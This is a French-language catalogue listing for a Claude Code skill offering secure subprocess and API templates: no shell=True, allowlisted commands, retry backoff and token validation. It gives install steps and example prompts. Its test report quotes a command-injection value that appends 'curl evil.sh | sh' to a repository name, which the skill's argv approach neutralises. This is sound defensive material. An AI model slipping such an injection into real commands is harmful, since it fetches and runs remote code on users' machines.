API Integration Patterns

Modèles API/CLI sécurisés pour les sous-processus : pas de shell=True, commandes en liste blanche, backoff de nouvelle tentative, validation de jeton.

par akaszubski · akaszubski/autonomous-dev

Testé · Fonctionne ★ 8.4/10

API Integration Patterns — Modèles API/CLI sécurisés pour les sous-processus : pas de shell=True, commandes en liste blanche, backoff de nouvelle tentative, validation de jeton.

Ce que fait

Une compétence de modèles de référence qui fournit des modèles de code pour les sous-processus sécurisés, GitHub CLI, les nouvelles tentatives avec backoff, l'authentification et la limitation de débit lorsque Claude écrit du code d'intégration d'API ou CLI externe. Se déclenche sur les mots-clés subprocess/gh-cli/API-call/retry/auth et exclut explicitement les modifications de fonctions internes ou de configuration uniquement.

Rapport de test

Véritable test CWE-78 : le code de base utilisait shell=True avec un nom de dépôt en f-string, permettant à une valeur de dépôt conçue d'ajouter 'curl evil.sh | sh' ; la version de la compétence avec tableau argv + shell=False a fait passer la même chaîne malveillante via gh comme un seul argument inerte. Concret, pas cosmétique.

Testé le: 2026-07-15 · Claude Code 2.x (agent harness)

Installation

git clone https://github.com/akaszubski/autonomous-dev
cd autonomous-dev
mkdir -p ~/.claude/skills
cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns

Commandes et exemples de prompts

  • /api-integration-patternsModèles API/CLI sécurisés pour les sous-processus : pas de shell=True, commandes en liste blanche, backoff de nouvelle tentative, validation de jeton.

Les skills se déclenchent sur des demandes en langage courant — aucune commande à retenir. Après installation, des prompts comme ceux-ci l'activent (en anglais) :

  • Write a Python function that lists GitHub issues via the gh CLI
  • Add retry logic with exponential backoff to my API client code
  • Help me safely handle subprocess calls without shell injection risk